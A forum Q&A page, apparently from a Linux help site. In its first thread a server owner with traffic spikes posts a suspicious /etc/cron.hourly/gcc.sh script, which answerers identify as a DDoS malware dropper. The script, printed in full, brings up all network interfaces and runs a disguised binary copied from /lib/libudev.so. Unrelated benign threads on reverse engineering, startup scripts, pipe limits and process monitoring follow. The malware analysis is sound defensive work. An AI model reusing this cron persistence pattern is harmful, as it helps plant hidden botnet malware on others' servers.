I have been experiencing spikes up to 1 Gbps on my server and have been looking for virus' and malware. I found this file: gcc.sh in /etc/cron.hourly and was wondering if anyone has seen anything like it, and would have some insight into the code. Thanks!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Quite likely. It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. It also runs a for loop to bring up all network connections even if you've turned them off. It uses the name of a well-known compiler to look legit. I'd call this 99%+ likely a virus.
Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . And yes, that's a DDoS virus on a unix system, exactly matching your problem.
yes it is.
try using ps -ef | grep -i libudev.so.6 to see the processes used by the program
Related
I would like to view the source code for a Linux command to see what is actually going on inside each command. When I attempt to open the commands in /bin in a text/hex editor, I get a bunch of garbage. What is the proper way to view the source on these commands?
Thanks in advance,
Geoff
EDIT:
I should have been more specific. Basically I have a command set that was written by someone who I can no longer reach. I would like to see what his command was actually doing, but without a way to 'disassemble' the command, I am dead in the water. I was hoping for a way to do this within the OS.
Many of the core Linux commands are part of the GNU core utils. The source can be found online here
The file you are opening is the binary executables which are the stuff the kernel passes to the CPU. These files are made using a compiler that takes in the source code you and I understand and turns it via a number of stages into this CPU friendly format.
You can find out the system calls that are being made using strace
strace your_command
Most likely you can download the source code with your distribution's package manager. For example, on Debian and related distros (Ubuntu included), first find which package the command belongs to:
$ dpkg -S /bin/cat
coreutils: /bin/cat
The output tells you that /bin/cat is in the coreutils package. Now you can download the source code:
apt-get source coreutils
This question is related to reverse engineering.
Some keyword is static analysis and dynamic analysis
use gdb to check that the binary file have symbol table inside or not. (if binary compile with debugging flag, you can get the source code and skip below step)
observe program behavior by strace/ltrace.
write seudo-code by use objdump/ida-pro or other disassembler.
run it by gdb to dynamic analysis and correct the seudo-code.
A normal binary file can be reverted back to source code if you want and have time. Conversely, an abnormal program is not easy to do this, but it only appear on specific ctf competition. (Some special skill like strip/objcopy/packer ... etc)
You can see assembly code of /bin/cat with:
objdump -d /bin/cat
Then analyze it and see what command can be launch.
Another way of approaching is strings /bin/cat, it is usefull make a initial idea and then reverse it.
You can get the source code of every linux command online anyway :D
I have the following bash script to update to my website my current ip. It works fine stand alone, but put into a startup file, fails upon startup. I'm guessing it's a sequencing thing, but I'm not sure how to fix the sequencing, and after a few hours of googling and trying everything I can think of, I'm hoping someone can lead me in the right direction! This is what I am trying to run:
#!/bin/sh
IP_ADDR=$(ifconfig eth0 | sed -rn 's/^.*inet addr:(([0-9]+\.){3}[0-9]+).*$/\1/p')
wget -q -O /dev/null http://example.com/private/RPi_IP.php?send=${IP_ADDR}
I can't figure out what to do. I tried adding it to other startup programs even, and it fails upon startup too. I'm using a Raspberry Pi. Any ideas?
Your path might not be what you expect. You should fully-qualify any commands that you use. Especially for programs that live in /sbin/
ie
/sbin/ifconfig
/usr/bin/sed
/usr/bin/wget
I've got a straight forward bash script generated with fwbuilder that nests several echo statements and pipes them through to iptables-restore.
We compile this way instead of just having multiple "iptables -A xxx" lines since it compiles and deploys much quicker and it also doesn't drop existing connections.
The problem is we seem to have hit the limit of allowed multiple redirects (~23'850 lines don't work, ~23'600 lines do).
Run it on kernel 2.6.18 (CentOS 5.x) and it breaks, run it on 2.6.32 (6.x) and it works like a charm.
Script essentially looks like this, comes out as just one long line piped to the command:
(echo "1"; echo "2"; echo "3"; ... ; echo "25000") | /do/anything
So I guess the question is, is there an easy way to increase this limit without recompiling the kernel? I'd imagine it's some sort of stdin character limitation of piping. Or do I have to do an OS upgrade?
edit: Oh and would also like to add that when running on the older kernel, no errors are shown, but a segfault shows in dmesg.
The reason that you're not observing the problem on 2.6.32 and observing it on 2.6.18 is that starting with kernel 2.6.23 the ARG_MAX limitation has been removed. This is the commit for the change.
In order to find some ways to circumvent the limit, see ARG_MAX.
Can you use a here-doc instead?
cat <<EOF | /do/anything
1
2
3
...
25000
EOF
I am currently working with a large data set where even the file format conversion takes at least an hour per subject and as a result I am often unsure whether my command has been executed or the program has frozen. I was wondering whether anyone has a tip to how to follow the progress of the commands/scripts I am trying to run in linux?
Your help will be much appreciated.
In addition to #basile-starynkevitch answer,
I have a bash script that can measure how much file did you processed in percents.
It watch into procfs get current position from fd information (/proc/pid/fdinfo), and count this in percents, relative to total file size.
See https://gist.github.com/azat/2830255
curl -s https://gist.github.com/azat/2830255/raw >| progress_fds.sh \
&& chmod +x progress_fds.sh
Usage:
./progress_fds.sh /path/to/file [ PID]
Сan be useful to someone
If the long-lasting command produces some output in a file foo.out, you could do watch ls -l foo.out or tail -f foo.out
You could also list /proc/$(pidof prog)/fd to find out the opened files of some prog
You can follow the syscalls of a program by using strace, which will enable you to follow the open calls.
You can use verbose output, but it will slow things down even more.
I guess there can't be a general answer to that, it just depends on the type of program (that doesn't even has to do anything with Linux, see the "halting problem").
If you happen to use a pipe during the conversion I find the pv(1) tool pretty helpful. Even if pv can't know the total size of the data it helps to see if there is actual progress and how good the datarate is. It isn't part of most standard installations though and probably has to be installed explicitly.
Before flagging the question as duplicate, please read my various issues I encountered.
A bit of background: we are developing a C++ application running on embedded ARM sbc using a lite variant of debian linux. The application start at boot launched by the boot script and print various information to stdout. What we would like is the ability to connect using SSH/Telnet and read the application output, without having to kill the process and restart it for the current bash session. I want to create a simple .sh script for non-tech-savvy people to use.
The first solution for the similar question posted here is to use gdb. First it's not user-friendly (need to write multiple commands manually) and I wonder why but it don't seems to output anything into the file.
The second solution strace -ewrite -p PID works perfectly, that's what I want. Problem is, there's a lot more information than just the stdout, and it's badly formatted.
I managed to get an "acceptable" result with strace -e write=1 -s 1024 -p 20049 2>&1 | grep "write(1," but it still have the superfluous write(1, "...", 19) = 19 text. Up to this point it's simply a bit of string formatting, and I've found on multiple other pages this line saying it achieve good formatting : strace -ff -e write=1,2 -s 1024 -p PID 2>&1 | grep "^ |" | cut -c11-60 | sed -e 's/ //g' | xxd -r -p
There are some things I find strange in this command (why -ff?, why grep "^ |"?, why use xxd there?) and it just don't output anything when I try it.
Unfortunately, we do use a old buggy version of busybox (1.7.1) that have some problem with multiple pipes. That bug gives me bad results. For example, if I only do grep it works, and if I only do cut it also works, but let's say "grep "write(1," | cut -c11-60" returns nothing.
I know the real solution would simply be to update busybox and use these multiple pipes to format the string, but we can't update it since the os distribution is already installed on thousands of boards shipped to our clients worldwide..
Anyone have a miraculous solution? Thanks
Screen can be connected to an existing process using reptyr (http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/), or you can use neercs (http://caca.zoy.org/wiki/neercs) which I haven't used but apparently is like screen but supports attaching to an existing process all by itself.